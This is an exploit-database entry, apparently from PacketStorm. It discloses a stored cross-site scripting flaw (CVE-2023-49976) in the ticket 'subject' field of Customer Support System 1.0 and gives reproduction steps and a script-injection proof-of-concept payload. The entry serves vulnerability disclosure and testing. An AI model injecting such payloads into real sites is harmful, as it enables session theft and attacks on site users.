Share
## https://sploitus.com/exploit?id=PACKETSTORM:179276
# Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list"  
# Date: 28/11/2023  
# Exploit Author: Geraldo Alcantara  
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code  
# Version: 1.0  
# Tested on: Windows  
# CVE : CVE-2023-49976  
*Steps to reproduce:*  
1- Log in to the application.  
2- Visit the ticket creation/editing page.  
3- Create/Edit a ticket and insert the malicious payload into the  
"subject" field/parameter.  
Payload: <dt/><b/><script>alert(document.domain)</script>